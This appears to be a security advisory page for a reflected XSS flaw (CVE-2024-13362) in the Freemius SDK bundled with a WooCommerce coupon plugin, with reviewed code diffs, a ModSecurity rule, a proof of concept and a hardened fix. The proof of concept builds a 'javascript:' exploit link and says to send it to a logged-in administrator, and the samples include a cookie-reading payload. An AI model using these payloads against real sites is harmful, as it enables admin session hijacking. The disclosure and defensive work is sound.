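Review bot: the unchanged anchor line below the changed condition closes two `<i>` elements too many (`</i></i></a>`), producing invalid markup in every row; drop the stray tags while touching this block. Skipping the product list for refunded orders via `get_status() != "refunded"` is reasonable, but the `else` branch must still render a cell so column counts stay aligned with the header.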
--- a/woo-coupon-usage/inc/dashboard/tab-statistics.php
+++ b/woo-coupon-usage/inc/dashboard/tab-statistics.php
@@ -147,9 +147,11 @@
$wcusage_monthly_summary_data_orders = array();
}
// Delete old months that are not needed
- foreach ( $wcusage_monthly_summary_data_orders as $key => $value ) {
- if ( $key != strtotime( $date1month ) && $key != strtotime( $date2month ) && $key != strtotime( $date3month ) ) {
- $wcusage_monthly_summary_data_orders[strtotime( $key )] = "";
+ if ( is_array( $wcusage_monthly_summary_data_orders ) && count( $wcusage_monthly_summary_data_orders ) > 12 ) {
+ foreach ( $wcusage_monthly_summary_data_orders as $key => $value ) {
+ if ( $key != strtotime( $date1month ) && $key != strtotime( $date2month ) && $key != strtotime( $date3month ) ) {
+ $wcusage_monthly_summary_data_orders[strtotime( $key )] = "";
+ }
}
}
// This Month
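Review bot: wrapping the loop in a `count() > 12` guard leaves the loop body still doing nothing useful: the keys are already Unix timestamps (they are compared against `strtotime( $date1month )`), so `strtotime( $key )` parses a timestamp string as a date and does not yield that key back, the assignment lands on an unrelated index, and assigning `""` keeps the entry rather than removing it, so the array never shrinks below the threshold. Use `unset( $wcusage_monthly_summary_data_orders[ $key ] );` inside the condition.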
--- a/woo-coupon-usage/inc/emails/new-order-email.php
+++ b/woo-coupon-usage/inc/emails/new-order-email.php
@@ -85,35 +85,83 @@
/**
* Include affiliate details in admin order email
*/
-if( !function_exists( 'wcusage_admin_order_email' ) ) {
- function wcusage_admin_order_email( $order, $sent_to_admin, $plain_text, $email ) {
+if ( ! function_exists( 'wcusage_admin_order_email' ) ) {
+ function wcusage_admin_order_email( $order, $sent_to_admin, $plain_text, $email ) {
- if ( $email->id === 'new_order' && $sent_to_admin ) {
-
- $order_id = $order->get_id();
-
- $affiliate = wcusage_order_meta($order_id,'wcusage_affiliate_user');
- $commission = wcusage_order_meta($order_id,'wcusage_total_commission');
-
- if($affiliate) {
-
- $user_info = get_userdata($affiliate);
+ $wcusage_field_new_order_info = wcusage_get_setting_value('wcusage_field_new_order_info', '1');
+ if(!$wcusage_field_new_order_info) {
+ return;
+ }
- $user_login = $user_info->user_login;
- $user_email = $user_info->user_email;
+ if ( $email->id === 'new_order' && $sent_to_admin ) {
- $affiliate_info = "<h2>Affiliate Information</h2>";
- $affiliate_info .= "<p><strong>Affiliate:</strong> " . $user_login . "</p>";
- $affiliate_info .= "<p><strong>Email:</strong> " . $user_email . "</p>";
- $affiliate_info .= "<p><strong>Commission:</strong> " . wcusage_format_price($commission) . "</p><br/><br/>";
-
- echo $affiliate_info;
+ $order_id = $order->get_id();
- }
+ $affiliate = wcusage_order_meta( $order_id, 'wcusage_affiliate_user' );
+ $commission = wcusage_order_meta( $order_id, 'wcusage_total_commission' );
- }
+ if ( $affiliate ) {
- }
+ $user_info = get_userdata( $affiliate );
+ $user_login = $user_info->user_login;
+ $user_email = $user_info->user_email;
+
+ // Affiliate Information Table
+ echo '<h2>' . esc_html__( 'Affiliate Information', 'woo-coupon-usage' ) . '</h2>';
+ echo '<table style="width: 100%; border-collapse: collapse; border: 1px solid #e5e5e5;" cellspacing="0" cellpadding="6" border="1">';
+ echo '<tbody>';
+ echo '<tr>';
+ echo '<th style="text-align: left; padding: 12px; background-color: #f7f7f7;">' . esc_html__( 'Affiliate', 'woo-coupon-usage' ) . '</th>';
+ echo '<td style="padding: 12px;">' . esc_html( $user_login ) . '</td>';
+ echo '</tr>';
+
+ // If coupons exist, display Coupon Information Table
+ if ( version_compare( WC_VERSION, 3.7, ">=" ) ) {
+ $coupons = $order->get_coupon_codes();
+ } else {
+ $coupons = $order->get_used_coupons();
+ }
+ if ( $coupons ) {
+
+ foreach ( $coupons as $coupon_code ) {
+
+ echo '<tr>';
+
+ $coupon = new WC_Coupon( $coupon_code );
+ $couponid = $coupon->get_id();
+ $coupon_name = $coupon->get_code();
+ $coupon_amount = $coupon->get_amount();
+ $coupon_type = $coupon->get_discount_type();
+ $coupon_description = $coupon->get_description();
+
+ $coupon_info = wcusage_get_coupon_inf
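Review bot: `get_userdata( $affiliate )` returns false when the stored affiliate user has since been deleted, and the lines that follow then read `->user_login` and `->user_email` on false (a warning plus a blank affiliate in the admin email); return early with `if ( ! $user_info ) { return; }`. `version_compare( WC_VERSION, 3.7, ">=" )` should pass the version as the string `'3.7'` rather than a float. Escaping `$user_login` with `esc_html()` where the old code echoed it raw is a good fix. The hunk is cut off mid-statement at `wcusage_get_coupon_inf`, so the coupon-table rendering that follows could not be reviewed here.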
ModSecurity Protection Against This CVE
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2024-13362
# Block reflected XSS via url parameter in Freemius trial promotion notices
# Targets admin.php pages with wcusage_tools and an unsanitized url parameter
# The directive spans several lines, so each continued line ends in a backslash.
# (?i) makes the scheme match case-insensitive: @rx is case-sensitive by
# default, so without it "JavaScript:" would slip past the rule.
SecRule REQUEST_URI "@rx /wp-admin/admin.php" \
    "id:20241994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius reflected XSS via url param',severity:'CRITICAL',tag:'CVE-2024-13362'"
    SecRule ARGS_GET:page "@rx ^wcusage_tools$" "chain"
    SecRule ARGS_GET:url "@rx (?i)(javascript|data|vbscript):" "t:none"
Proof of Concept (PHP)
NOTICE:
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter
// Configuration
$target_url = 'https://example.com/wp-admin/admin.php?page=wcusage_tools&url=';
$payload = 'javascript:alert("XSS by Atomic Edge")';
$malicious_url = $target_url . urlencode($payload);
echo "[+] Atomic Edge PoC for CVE-2024-13362\n";
echo "[+] Target URL: " . $target_url . "\n";
echo "[+] Payload: " . $payload . "\n";
echo "[+] Crafted malicious URL: " . $malicious_url . "\n\n";
echo "[+] To exploit, send this link to an authenticated administrator:\n";
echo $malicious_url . "\n\n";
// Simulate the vulnerable code path
function simulate_vulnerable_sdk($trial_url) {
    // This mimics the vulnerable sprintf call from the diff: the URL is
    // dropped into href="" with no escaping or scheme check.
    $button = sprintf(
        '<a style="margin-left:10px; vertical-align:super;" href="%s"><button class="button button-primary">start free trial ➜</button></a>',
        $trial_url
    );
    return $button;
}
echo "[+] Simulating vulnerable SDK output:\n";
echo simulate_vulnerable_sdk($malicious_url) . "\n";
echo "[+] Exploit URL:\n";
echo $malicious_url . "\n";
?>
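As an added example that is not part of the Atomic Edge PoC or the Freemius SDK, the vulnerable sprintf pattern next to a hardened form: the button is built only after the URL has passed a scheme allow-list and been attribute-escaped. `wcusage_demo_safe_url()` is a stand-in written here for WordPress's `esc_url()`, which does the equivalent protocol filtering and is what the real fix would call; it is stricter than `esc_url()` in that scheme-less URLs are dropped rather than given an `http://` prefix, and the sample inputs are constructed.

```php
<?php
// Added example (not Freemius SDK code): vulnerable vs. hardened trial button.

// Vulnerable pattern from the advisory: the URL lands in href="" unchanged,
// so a javascript: scheme becomes a clickable script in the admin notice.
function trial_button_vulnerable( string $trial_url ): string {
    return sprintf(
        '<a style="margin-left:10px; vertical-align:super;" href="%s"><button class="button button-primary">start free trial ➜</button></a>',
        $trial_url
    );
}

// Stand-in for WordPress esc_url() (assumption: same verdict for these inputs).
// Returns '' for any absolute URL whose scheme is not allow-listed, otherwise
// the URL with attribute-breaking characters entity-encoded.
function wcusage_demo_safe_url( string $url ): string {
    $allowed_schemes = array( 'http', 'https', 'mailto' );
    // Decode entities first so an encoded colon or scheme is seen for what it is,
    // then strip control characters and whitespace, which browsers ignore inside
    // a scheme.
    $url = html_entity_decode( trim( $url ), ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    $url = preg_replace( '/[\x00-\x20\x7F]/', '', $url );
    if ( $url === '' ) {
        return '';
    }
    // Relative URLs (/, #, ?) carry no scheme and only need escaping.
    if ( in_array( $url[0], array( '/', '#', '?' ), true ) ) {
        return htmlspecialchars( $url, ENT_QUOTES, 'UTF-8' );
    }
    // Anything else must start with an allow-listed scheme; the scheme is
    // compared case-insensitively because browsers treat it that way.
    if ( ! preg_match( '/^([a-z][a-z0-9+.-]*):/i', $url, $m )
        || ! in_array( strtolower( $m[1] ), $allowed_schemes, true ) ) {
        return '';
    }
    return htmlspecialchars( $url, ENT_QUOTES, 'UTF-8' );
}

// Hardened form: validate and escape before the value reaches the format
// string, and suppress the button entirely when the URL is rejected.
function trial_button_hardened( string $trial_url ): string {
    $safe = wcusage_demo_safe_url( $trial_url );
    if ( $safe === '' ) {
        return '';
    }
    return sprintf(
        '<a style="margin-left:10px; vertical-align:super;" href="%s"><button class="button button-primary">start free trial ➜</button></a>',
        $safe
    );
}

// Constructed sample inputs: a legitimate trial link, a relative link, the
// payload shape from this advisory, and the two schemes the WAF rule names.
$samples = array(
    'https://checkout.example-vendor.test/trial/?plan=1&ref=a"b',
    '/wp-admin/admin.php?page=wcusage_tools',
    'javascript:alert(document.cookie)',
    'JaVaScRiPt:alert(1)',
    'data:text/html,<script>alert(1)</script>',
);

foreach ( $samples as $url ) {
    echo "input:      " . $url . "\n";
    echo "vulnerable: " . trial_button_vulnerable( $url ) . "\n";
    echo "hardened:   " . ( trial_button_hardened( $url ) ?: '(button suppressed)' ) . "\n\n";
}
```

Run with `php` on the command line; the vulnerable column reproduces the advisory's injected href for the three script-bearing inputs, while the hardened column keeps only the two legitimate links, with the `"` in the first one encoded so it cannot close the attribute.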